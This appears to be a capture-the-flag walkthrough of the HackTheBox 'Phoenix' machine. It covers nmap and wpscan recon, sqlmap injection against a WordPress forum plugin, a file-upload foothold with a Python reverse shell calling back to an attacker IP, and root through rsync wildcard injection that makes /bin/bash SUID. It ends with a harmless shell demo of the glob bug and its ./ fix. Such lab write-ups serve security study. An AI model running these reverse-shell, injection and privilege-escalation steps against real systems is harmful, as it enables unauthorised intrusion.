HackTheBox-Phoenix

NMAP

PORT     STATE SERVICE  VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
443/tcp open ssl/http Apache httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Issuer: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-02-15T20:08:43
| Not valid after: 2032-02-13T20:08:43
| MD5: 320f c0ee 2f18 bd78 3abc e9d8 66a6 fc26
|_SHA-1: 6879 3f3b c7d3 a517 6785 bcc7 a726 51ce 8827 4a68
| tls-alpn:
|_ http/1.1
8888/tcp open http SimpleHTTPServer 0.6 (Python 3.8.10)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80/443 (HTTP/HTTPS)

Visiting port 80 redirects to https://phoenix.htb/ (port 443), so add phoenix.htb to /etc/hosts before going further.

wpscan --url https://phoenix.htb --disable-tls-checks -e ap -v

The subscribe_topic parameter of the Asgaros Forum plugin turns out to be injectable, so sqlmap can confirm the injection and then read the active plugin list straight out of wp_options (option_value is a PHP-serialized array; the plugin slugs it contains are listed below):

sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" --level=2 --risk=2 --batch
sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" --level=2 --risk=2 --sql-query="SELECT option_value FROM wp_options WHERE option_name = 'active_plugins';" --batch
  • accordion-slider-gallery
  • adminimize
  • asgaros-forum
  • download-from-files

Foothold

Public exploits for accordion-slider-gallery and adminimize were far too old to apply, but download-from-files has a recent arbitrary file upload vulnerability, which is enough to get code execution on the web server and call back a reverse shell. Payload executed on the target (connects back to the attacker at 10.10.14.124:2222):

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.124",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Privilege Escalation (editor)

The miniOrange plugin was a rabbit hole: it only provides 2FA for the WordPress login. The SSH configuration is more interesting: Google Authenticator is in use, wired into sshd through a PAM module.

NOW=$(date +"%Y-%m-%d-%H-%M")
FILE="phoenix.htb.$NOW.tar"
cd /backups
mysqldump -u root wordpress > dbbackup.sql
tar -cf $FILE dbbackup.sql && rm dbbackup.sql
gzip -9 $FILE
find . -type f -mmin +30 -delete
rsync --ignore-existing -t *.* jit@10.11.12.14:/backups/
  1. The script first runs the date command and saves the timestamp in the NOW variable.
  2. FILE holds the archive name, built from that timestamp.
  3. It changes into the /backups directory.
  4. It runs mysqldump to dump the wordpress database into dbbackup.sql.
  5. It creates a tar archive of dbbackup.sql and removes the original dump.
  6. It gzips the tar archive.
  7. find -mmin +30 -delete removes every regular file under /backups whose modification time is more than 30 minutes old (not files modified in the last 30 minutes), so anything we drop there has to be consumed before a later run cleans it up.
  8. Finally it runs rsync (--ignore-existing skips files already present on the receiver, -t preserves modification times) to push the backups to a remote host. The unquoted *.* glob is expanded by the shell before rsync starts, so a file whose name begins with a dash is handed to rsync as an option rather than as a path. This is wildcard (argument) injection: a file named "-e sh script.sh" becomes rsync's -e/--rsh option, and rsync runs sh script.sh as its "remote shell" instead of ssh. Note that *.* only matches names containing a dot, which the crafted name satisfies because of script.sh.

Because the script is executed as root, write the payload into /backups/script.sh and then create the crafted filename in /backups:

chmod +s /bin/bash
touch -- "-e sh script.sh"

The first line is the content of script.sh; the second creates the file whose name gets injected as the -e option (the -- stops touch itself from treating the name as an option). Once the script has run, /bin/bash is SUID root and can be started with bash -p so that it keeps the elevated effective uid.
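The expansion step above is easy to verify without rsync, cron or a second host, because the shell decides the argv before rsync even starts. The following is an added example, not part of the writeup: it builds a scratch copy of /backups (the backup file name is constructed for the demo), prints what a bare *.* glob hands to the command, and shows the usual hardening of anchoring the glob with ./ so that no expanded element can begin with a dash. The function names are arbitrary.

```shell
# Added example: reproduce the rsync wildcard injection from the backup script
# in a scratch directory. Nothing here talks to the network; the bug lives in
# the shell's glob expansion, which is all we need to observe.

setup_backups_dir() {
    d=$(mktemp -d)
    : > "$d/phoenix.htb.2022-02-15-20-08.tar.gz"     # a normal backup (constructed name)
    printf 'chmod +s /bin/bash\n' > "$d/script.sh"   # payload the injected -e would run
    : > "$d/-e sh script.sh"                         # crafted name, same as: touch -- "-e sh script.sh"
    printf '%s\n' "$d"
}

# Unsafe, exactly as in the backup script: a bare *.* glob. Prints one argv
# element per line, which is what the shell would pass to rsync.
argv_unsafe() ( cd "$1" && printf '%s\n' *.* )

# Hardened: anchoring the glob with ./ means every expansion starts with "./",
# so a name like "-e sh script.sh" is passed as the path "./-e sh script.sh".
argv_safe() ( cd "$1" && printf '%s\n' ./*.* )

# Count how many argv elements a command would parse as options (start with '-').
# "|| true" keeps grep's exit status 1 on zero matches from tripping set -e.
count_option_like() { grep -c '^-' || true; }

main() {
    d=$(setup_backups_dir)
    echo "argv with bare glob (what the cron script does):"
    argv_unsafe "$d"
    echo "option-like elements: $(argv_unsafe "$d" | count_option_like)"
    echo
    echo "argv with ./ anchored glob:"
    argv_safe "$d"
    echo "option-like elements: $(argv_safe "$d" | count_option_like)"
    rm -rf "$d"
}

main
```

With the bare glob the element "-e sh script.sh" is a single argv entry; rsync reads it as -e with the attached value " sh script.sh", splits that on whitespace and executes sh script.sh where it would normally execute ssh. With ./*.* the same file is just one more path to transfer, which is why the fix is a one-character change to the script rather than a change to rsync.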
